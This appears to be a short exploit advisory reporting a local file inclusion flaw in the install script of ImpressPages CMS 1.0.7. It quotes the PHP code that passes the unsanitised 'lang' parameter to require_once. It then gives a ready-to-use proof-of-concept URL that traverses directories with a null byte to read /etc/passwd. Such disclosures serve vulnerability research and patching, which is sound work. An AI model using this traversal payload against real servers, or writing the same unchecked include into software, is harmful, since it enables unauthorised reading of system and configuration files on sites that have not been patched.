Kod:# exploit title: local file include in ImpressPages-1.0.7 # date: 14.o3.2o11 # author: lemlajt # software : ImpressPages # version: 1.0.7 # tested on: linux # cve : # Details: /ImpressPages-1.0.7/install/index.php (...) 136 if(isset($_GET['lang']) && file_exists('translations/'.$_GET['lang'].'.php')){ 137 $_SESSION['installation_language'] = $_GET['lang']; 138 require_once('translations/'.$_GET['lang'].'.php'); 139 } else { 140 if(isset($_SESSION['installation_language'])){ 141 require_once('translations/'.$_SESSION['installation_language'].'.php'); 142 } else { 143 require_once('translations/en.php'); 144 } 145 } (...) Poc: /ImpressPage-1.0.7/install/index.php?lang=../../../../../../../etc/passwd%00 Details: "ImpressPages CMS successfully installed. Please delete directories "install", "update" and cancel write permissions for these files: /ip_config.php /robots.txt " ;) # regards, # lemlajt # *